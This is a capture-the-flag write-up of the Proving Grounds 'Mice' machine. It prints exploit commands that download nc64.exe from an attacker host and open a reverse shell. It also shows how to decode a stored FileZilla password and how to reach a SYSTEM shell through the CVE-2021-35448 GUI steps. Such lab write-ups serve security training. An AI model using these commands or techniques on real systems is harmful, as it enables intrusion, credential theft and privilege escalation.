Mice - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed RDP and Remote Mouse ports were open.
Exploitation
Remote Mouse 3.008 RCE
Remote Mouse 3.008 was vulnerable to remote code execution by sending arbitary mouse signals. So some research revealed p0dalirius/RemoteMouse-3.008-Exploit which allows you to send any command you want.
- At first I transfered nc64.exe
python RemoteMouse-3.008-Exploit.py -t 192.168.224.199 -c 'powershell iwr http://192.168.45.216/nc64.exe -outfile C:\ProgramData\nc64.exe' -v - Then I executed it and obtained reverse shell
python RemoteMouse-3.008-Exploit.py --target-ip 192.168.224.199 --cmd 'powershell -c "C:\ProgramData\nc64.exe 192.168.45.216 80 -e cmd.exe"' -v - Ports other than port 80 was not working. So I had to use port 80.
Then I simply read local flag.
Privilege Escalation
FileZilla Password (recentservers.xml)
I executed WinPEAS.exe and found two available FileZilla files.
C:\Users\divine\AppData\Roaming\FileZilla\filezilla.xml→ version etc.C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml→ session information, password etc.
I read both of them. I noted FileZilla version then read base64 encoded FileZilla password.
Then I decoded the password and RDP into same user we got reverse shell.
CVE-2021-35448
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.
This version of Remote Mouse was vulnerable to GUI based Privilege Escalation and as we have RDP session we could exploit this.
- Open Remote Mouse from the system tray
- Go to “Settings”
- Click “Change…” in “Image Transfer Folder” section
- “Save As” prompt will appear
- Enter “C:\Windows\System32\cmd.exe” in the address bar and click enter
- A new command prompt is spawned with SYSTEM privileges
Then I simply read Administrator flag.